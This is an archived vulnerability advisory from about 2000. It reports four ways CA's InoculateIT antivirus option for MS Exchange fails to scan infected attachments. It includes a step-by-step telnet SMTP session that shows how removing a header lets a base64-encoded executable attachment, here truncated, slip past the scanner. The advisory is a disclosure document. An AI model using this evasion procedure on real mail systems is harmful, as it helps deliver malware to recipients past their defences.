TUCoPS :: Security App Flaws :: ci4.htm

InoculateIT - four weaknesses 
Vulnerability

    InoculateIT

Affected

    InoculateIT

Description

    Hugo Caye  found following.   The scenario  is two  EX Srvrs,  two
    different  organizations  and  different  sites,  both  have  CA's
    "InoculateIT AV Option  for MS Exchange  Server".  MS  IMC (the EX
    SMTP gateway) will be used to send messages between the EX  Srvrs.
    Where the Agent fails:

    1. If a message  is sent from one  EX to another (using  IMC), and
       this message has  an infected file  (any file with  any virus),
       "InoculateIT AV Option for MS Exchange Server" will not  detect
       the attached file  if the body  of the message  contains _only_
       the attached file.  If _any_ character is inserted on the  body
       of the message (a dot, a tab, a space), "InoculateIT AV  Option
       for MS Exchange Server" will detect the virus on attached file;

    2. Another  weakness  in  "InoculateIT  AV Option for MS  Exchange
       Server" is that  it does not  recognize embedded messages.   If
       the  message  has  an  embedded  message,  and  this one has an
       infected attached file, "InoculateIT AV Option for MS  Exchange
       Server" will not open the attached message to scan the infected
       attached file;

    3. "InoculateIT  AV  Option  for  MS  Exchange Server" just  scans
       messages that  are posted  on the  Inbox folder.   If a  served
       based  rule  automatically  moves  messages  to  another folder
       (TurfMail for exemple), "InoculateIT AV Option for MS  Exchange
       Server" will not  scan this message  allowing that an  infected
       files reach the mailbox.

    4. Another  bug that  can easily  be demonstrated  is telneting on
       tcp/25   against   a   EX   Srvr   with   IMC   (the   MS  SMTP
       connector/service).  Just change some SMTP headers and the CA's
       AVEX Agent neither  opens the attached  file that is  infected.
       It is not a signature issue,  since you can also send the  CA's
       virtest.com sample file.  Any file can be send, since the  AVEX
       Agent doesn't recognize the message as having an attached file.

    Something like that can be easily done:
    4.a. Get a message  containing any infected attached  MIME encoded
         file.   We simply  filter out  via EX  to C:\TurfDir  sending
         from outside to EX;
    4.b. Edit  the file  (I used  MS Notepad.exe)  and just remove the
         "From:  ..." line from the SMTP header.  Something like this:

         ==>> Remove this line: From: Test <Test@abc.com.br>
         To: Hugo Caye <Hugo@xyz.com.br>
         Subject: Test
         Date: Mon, 23 Oct 2000 10:59:53 -0200
         MIME-Version: 1.0
         X-Mailer: Internet Mail Service (5.5.2650.21)
         Content-Type: application/x-msdownload;
                 name="Fix2001.exe"
         Content-Transfer-Encoding: base64
         Content-Disposition: attachment;
                 filename="Fix2001.exe"
         
         TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
         aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
         1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
         AgAAAAAAABAAAAAQAAAAMAAA... <<== Removed the rest here;
         
             4.c. Copy the Notepad content to clipboard;
             4.d. Issue "telnet your_exsrvr 25" command:
         
         220 aaa.xyz.com.br ESMTP Server (Microsoft Exchange Internet Mail
         Service 5.5.2650.21) ready
         helo
         250 OK
         mail from:<>
         250 OK - mail from <>
         rcpt to:<hugo@xyz.com.br>
         250 OK - Recipient <hugo@xyz.com.br>
         data
         354 Send data.  End with CRLF.CRLF

    Here,  paste  from  clipboard  (Win2K,  just a mouse right-click).
    Something like this:

         To: Hugo Caye <Hugo@xyz.com.br>
         Subject: Test
         Date: Mon, 23 Oct 2000 10:59:53 -0200
         MIME-Version: 1.0
         X-Mailer: Internet Mail Service (5.5.2650.21)
         Content-Type: application/x-msdownload;
                 name="Fix2001.exe"
         Content-Transfer-Encoding: base64
         Content-Disposition: attachment;
                 filename="Fix2001.exe"
         
         TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
         aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
         1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
         AgAAAAAAABAAAAAQAAAAMAAA... <<== Removed...
         ....AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         
         
         .
         250 OK
         quit
         221 closing connection

    4.e. Message sent, CA's Agent will not detect the infected file.
    4.f. This  is just  one manner  editing SMTP  headers to avoid the
         infected file detection.  There are at least more two holes.

Solution

    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH